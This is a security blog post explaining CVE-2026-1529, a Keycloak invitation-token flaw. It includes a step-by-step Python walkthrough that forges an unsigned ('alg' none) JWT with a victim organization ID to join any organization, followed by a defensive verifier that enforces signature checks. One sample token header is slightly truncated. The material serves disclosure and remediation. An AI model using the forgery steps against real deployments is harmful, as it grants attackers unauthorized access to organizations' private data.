Recently, a security flaw was discovered in Keycloak, the popular open-source Identity and Access Management solution. This vulnerability, tracked as CVE-2026-1529, could let an attacker join any organization by tampering with invitation tokens. If your organization uses Keycloak invitations for onboarding users, understanding—and fixing—this vulnerability is critical.
In this post, we break down how the bug works, show how an attacker might exploit it, provide sample code, and point you to Keycloak's relevant updates. Let’s dive in.
What is Keycloak Invitation Token?
Keycloak invitation tokens let organizations send a secure, one-time link to invite people to their groups or platforms. Typically, a JSON Web Token (JWT) carries info like the Organization ID and the recipient’s email address. This JWT is supposed to be tamper-evident thanks to cryptographic signatures—if anyone changes its contents, Keycloak should reject it.
The Flaw: Where Things Went Wrong
CVE-2026-1529 arises because Keycloak failed to verify JWT signatures on invitation tokens in some parts of its code. As a result, an attacker could:
1. Decode the token.
2. Modify the organization ID and email address inside the payload.
3. Re-encode the token *without* needing the signing key, and use it to register as a new user in _any_ organization.
Why Is This So Dangerous?
This completely undermines Keycloak’s trust model: anyone with a valid invitation token can now join any organization, possibly gaining access to private resources, internal communication, or sensitive data.
1. Obtain a Legitimate Invitation Token
Say you sign up for a public beta and receive an email like:
https://keycloak.example.com/auth/invitation?invitation=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjEyMzQ1IiwiZW1haWwiOiJhdHRhY2tlckBleGFtcGxlLmNvbSJ9.
2. Decode the Token
Use an online tool (like jwt.io) or a few lines of Python. Let's break it down:
import base64
import json

token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjEyMzQ1IiwiZW1haWwiOiJhdHRhY2tlckBleGFtcGxlLmNvbSJ9.'

# A JWT is three base64url segments separated by dots; the signature segment is empty here.
header, payload, signature = token.split('.')

# JWT segments are unpadded base64url, so restore the padding before decoding.
payload_json = base64.urlsafe_b64decode(payload + '=' * (-len(payload) % 4))
print(json.loads(payload_json))
You get something like:
{
  "orgID": "12345",
  "email": "attacker@example.com"
}
3. Modify & Re-Encode the Payload
Let's change the orgID to another target organization and the email to something under the attacker's control:
payload_data = {
    "orgID": "90001",                  # target org ID (victim)
    "email": "eviluser@evilmail.com"   # attacker's email
}

# Compact separators so the encoding matches the example token below; strip the padding as JWTs do.
modified_payload = base64.urlsafe_b64encode(
    json.dumps(payload_data, separators=(',', ':')).encode()
).decode().rstrip('=')
The new JWT becomes:
<original header>.<modified payload>.
Example:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjkwMDAxIiwiZW1haWwiOiJldmlsdXNlckBldmlsbWFpbC5jb20ifQ.
Notice that alg is none: no signature is enforced.
4. Use the Modified Token
Submit the altered invitation token in a registration form—or visit the invitation URL with the new token. Due to the bug, Keycloak skips signature verification, lets you register, and you’re inside the target organization.
How To Protect Your Organization
Keycloak Fix Available:
The Keycloak team has addressed this in recent versions. Ensure that cryptographic signature verification is enforced on _all_ JWTs, especially invitation tokens. Here’s their official advisory with patched releases.
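To make the fix concrete, here is an added example (written for this post, not Keycloak's own code) of the check that was missing in the flaw described above: an invitation-token verifier that refuses any algorithm outside an allowlist (so "alg": "none" is rejected before any claim is read), checks the signature with a constant-time comparison, and only then trusts the orgID and email claims. It uses HS256 with a constructed demo key so that it runs offline with the standard library; a Keycloak realm signs with its own key material, and the claim names, the DEMO_KEY and the INVITEE_EMAIL binding are assumptions for illustration. The unsigned token it rejects carries the same payload as the tampered token from the walkthrough.

```python
import base64
import hashlib
import hmac
import json

# Algorithms this verifier accepts. "none" is deliberately absent, so an
# unsigned token is rejected before any of its claims are trusted.
ALLOWED_ALGS = {"HS256"}

# Constructed demo key (assumption): a real deployment uses the realm's signing keys.
DEMO_KEY = b"demo-realm-hmac-key-not-for-production"

# Constructed unsigned token: {"alg":"none","typ":"JWT"} header, the walkthrough's
# tampered payload {"orgID":"90001","email":"eviluser@evilmail.com"}, empty signature.
UNSIGNED_TOKEN = (
    "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
    "eyJvcmdJRCI6IjkwMDAxIiwiZW1haWwiOiJldmlsdXNlckBldmlsbWFpbC5jb20ifQ."
)


class InvalidInvitationToken(Exception):
    """Raised when an invitation token fails any integrity or claim check."""


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def sign_invitation(claims: dict, key: bytes) -> str:
    """Issue an HS256-signed invitation token (demo issuer, not Keycloak's)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(signature)}"


def verify_invitation(token: str, key: bytes, expected_email: str) -> dict:
    """Return the claims only if every check passes, in this order:
    structure, allowed algorithm, signature, then the claims themselves."""
    parts = token.split(".")
    if len(parts) != 3:
        raise InvalidInvitationToken("token must be header.payload.signature")
    header_b64, payload_b64, sig_b64 = parts

    try:
        header = json.loads(_b64url_decode(header_b64))
    except ValueError:  # covers bad base64url, bad UTF-8 and bad JSON
        raise InvalidInvitationToken("header is not valid base64url JSON")
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        # Rejects "none", a missing alg, and any downgrade to an unexpected algorithm.
        raise InvalidInvitationToken(f"algorithm {header.get('alg') if isinstance(header, dict) else None!r} is not allowed")

    expected_sig = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    try:
        presented_sig = _b64url_decode(sig_b64)
    except ValueError:
        raise InvalidInvitationToken("signature is not valid base64url")
    # Constant-time comparison so a forged signature leaks nothing through timing.
    if not hmac.compare_digest(expected_sig, presented_sig):
        raise InvalidInvitationToken("signature does not match")

    # Only now are the claims trustworthy; bind them to the account registering.
    try:
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:
        raise InvalidInvitationToken("payload is not valid base64url JSON")
    if not isinstance(claims, dict) or not claims.get("orgID"):
        raise InvalidInvitationToken("invitation names no organization")
    if claims.get("email") != expected_email:
        raise InvalidInvitationToken("invitation was issued to a different email")
    return claims


def is_accepted(token: str, key: bytes, expected_email: str) -> bool:
    """Convenience wrapper: True only when verify_invitation() returns claims."""
    try:
        verify_invitation(token, key, expected_email)
        return True
    except InvalidInvitationToken:
        return False


if __name__ == "__main__":
    invitee = {"orgID": "12345", "email": "invitee@example.com"}  # constructed sample claims
    good = sign_invitation(invitee, DEMO_KEY)
    print("signed token accepted:", is_accepted(good, DEMO_KEY, "invitee@example.com"))
    print("unsigned (alg none) token accepted:", is_accepted(UNSIGNED_TOKEN, DEMO_KEY, "eviluser@evilmail.com"))
```

The ordering inside verify_invitation is the point: the header is parsed only to choose the algorithm, the signature is checked against the exact bytes received, and the orgID and email are read last. Re-encoding the payload without the key, as in the walkthrough, changes the signing input and fails the compare_digest step, and a token whose header says none never reaches the signature check at all.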
Reference Materials
- Keycloak Security Notices
- JSON Web Token (JWT) Debugger
- CVE-2026-1529 NVD Entry (once published)
Conclusion
CVE-2026-1529 serves as a stark reminder of the importance of signature verification in authentication flows. If you use Keycloak’s invitation system, patch now and review your setup. Don’t give attackers an open door—make sure your identity system does its job securely.
Timeline
Published on: 02/09/2026 18:36:15 UTC
Last modified on: 02/10/2026 12:40:29 UTC